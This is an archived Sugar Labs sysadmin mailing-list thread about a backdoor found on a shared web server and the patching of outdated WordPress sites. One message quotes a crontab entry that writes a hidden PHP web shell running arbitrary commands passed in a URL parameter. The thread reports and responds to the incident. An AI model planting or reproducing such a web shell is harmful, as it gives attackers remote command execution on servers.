[Systems] Found a backdoor
Walter Bender
walter.bender at gmail.com
Tue Mar 1 20:49:47 EST 2016
Let's shut it down for the time being. I've been updating the wiki but not
my blog since the attack last year anyway.
-walter
On Tue, Mar 1, 2016 at 7:57 PM, Bernie Innocenti <bernie at codewiz.org> wrote:
> +walter
>
> Can we appoint an official maintainer for walterbender.org? Sorry for
> not stepping up myself, but I'm overwhelmed by work related things and
> trying to reduce my sysadmin load.
>
> On 03/01/2016 02:50 PM, Samuel Cantero wrote:
> > On Tue, Mar 1, 2016 at 3:21 AM, Bernie Innocenti <bernie at codewiz.org
> > <mailto:bernie at codewiz.org>> wrote:
> >
> > On 02/25/2016 04:09 AM, Sebastian Silva wrote:
> > > Remember in June we had an incident with a broken Wordpress site.
> > > I switched to static generator since then.
> > >
> > > +1 on containers just learning more about them and finding them
> fascinating.
> > > Count me in on containerizing everything.
> > >
> > > I'm not aware of other wordpress sites. Maybe walter's blog?
> > > Wordpress is a PIA IMHO.
> >
> > Yes, WP is riddled with security holes. Back in October, Samuel
> helped
> > Walter upgrade walterbender.org <http://walterbender.org> on
> > sunjammer. Samuel, can you confirm
> > that the WP instance now fully patched and locked down?
> >
> >
> > The WP version on walterbender.org <http://walterbender.org> site is
> > 4.3.1. The WP last version is 4.4.2. I have checked the WP change log
> > and we can find this:
> >
> > 4.4.1 => WordPress versions 4.4 and earlier are affected by a cross-site
> > scripting vulnerability that could allow a site to be compromised.
> >
> > 4.4.2 => WordPress versions 4.4.1 and earlier are affected by two
> > security issues: a possible SSRF for certain local URIs, and an open
> > redirection attack.
> >
> > This site also uses the 2.5.9 akismet plugin. The last version is 3.1.7.
> > Significant information on the release notes:
> >
> > * Pre-emptive security improvements to ensure that the Akismet plugin
> > can't be used by attackers to compromise a WordPress installation.
> > * Closes a potential XSS vulnerability.
> >
> > Of course, every version has a lot of bug fixes. We definitely should
> > upgrade it and test nothing breaks walterbender.org
> > <http://walterbender.org> site.
> >
> > Who is in charge of upgrading the others WP sites?
> >
> > Regards,
> >
> > Samuel C.
> >
> >
> >
> >
> > > Regards,
> > > Sebastian
> > >
> > >
> > > On 25/02/16 04:47, Bernie Innocenti wrote:
> > >> While I was looking for cronjobs in /var/spool/cron/crontabs/, i
> > found
> > >> that www-data was executing commands like these:
> > >>
> > >> */27 * * * * echo '<?php if (substr(md5($_GET["localdate"]),0,6)
> ==
> > >> "6fbcb8") { $time = str_replace("@"," ",$_GET["localtime"]);
> > >> @system($time); exit; } ?>' > /srv/www-somosazucar/blog/.cache.php
> > >>
> > >> Did you spot the system()? This executes arbitrary commands
> specified
> > >> via the "localtime" url parameter. Uh-oh.
> > >>
> > >> There were about a dozen lines like the above, installing
> > .cache.php in
> > >> various virtualhosts. I kept a copy of the file in
> > >> /root/www-data.backdoor. The file was last written on Jun 23
> 2015,
> > >> which may correlate with the switch to the new website.
> > >>
> > >> I cleared the mess and searched the logs for requests containing
> > >> "localtime", but couldn't find any. I wonder if they could filter
> the
> > >> logs, since they were previously writable by www-data.
> > >>
> > >> Please watch out. We should ensure directories accessible over
> > http are
> > >> not writable by user www-data, especially those in which PHP and
> CGIs
> > >> are enabled.
> > >>
> > >> Running several large sites under the same uid has always been a
> bad
> > >> security practice, and looking forward we should keep migrating
> > them to
> > >> properly isolated containers.
> > >>
> > >> Finally, Wordpress is particularly dangerous and we should update
> and
> > >> harden all instances. Can someone please take care of this? I'll
> do
> > >> Mediawiki, which I know pretty well.
> > >>
> > >
> >
> >
> > --
> > _ // Bernie Innocenti
> > \X/ http://codewiz.org
> > _______________________________________________
> > Systems mailing list
> > Systems at lists.sugarlabs.org <mailto:Systems at lists.sugarlabs.org>
> > http://lists.sugarlabs.org/listinfo/systems
> >
> >
> >
> >
> > _______________________________________________
> > Systems mailing list
> > Systems at lists.sugarlabs.org
> > http://lists.sugarlabs.org/listinfo/systems
> >
>
>
> --
> _ // Bernie Innocenti
> \X/ http://codewiz.org
>
--
Walter Bender
Sugar Labs
http://www.sugarlabs.org
<http://www.sugarlabs.org>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.sugarlabs.org/archive/systems/attachments/20160301/4e87538c/attachment.html>
More information about the Systems
mailing list